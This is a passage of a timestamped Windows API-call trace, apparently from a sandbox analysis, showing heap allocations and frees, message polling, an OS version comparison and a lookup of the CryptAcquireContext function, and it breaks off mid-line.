RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0087.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0087.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.402] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0087.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0087.403] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0087.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0087.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0087.403] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0087.403] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.404] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0087.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0087.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0087.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.404] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0087.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0087.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0087.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0087.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0087.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0087.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0087.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.421] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0087.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0087.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0087.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0087.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0087.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.422] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a684c8 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0087.422] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0087.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0087.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0087.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684c8 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0087.424] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.424] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.424] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.424] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.424] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0087.424] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.424] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.425] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0087.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0087.426] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContext") returned 0x0 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0087.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0087.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0087.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6300 [0087.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0087.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 